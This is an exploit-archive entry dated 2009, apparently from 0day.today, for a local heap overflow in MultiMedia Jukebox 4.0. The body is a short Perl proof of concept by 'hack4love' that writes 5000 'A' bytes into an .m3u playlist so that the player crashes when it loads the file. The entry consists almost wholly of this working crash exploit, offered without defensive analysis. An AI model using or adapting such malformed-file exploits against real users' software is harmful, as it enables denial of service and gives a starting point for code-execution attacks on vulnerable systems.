id: 6922
date: 07/15/2009
title: MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u) Heap Overflow PoC
author: hack4love
cves: 

===================================================================
MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u) Heap Overflow PoC
===================================================================


#!/usr/bin/perl
# Found By :: HACK4LOVE
# MultiMedia Jukebox 4.0 Build 020124 (.pst / .m3u ) Local Heap Overflow PoC
# http://www.brothersoft.com/sorcerer-software-multimedia-jukebox-251913.html
########################################################################################
# special thanks for sec-code.com and sniper code
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.m3u');
print myfile $crash;
########################################################################################



#  0day.today [2023-03-26]  #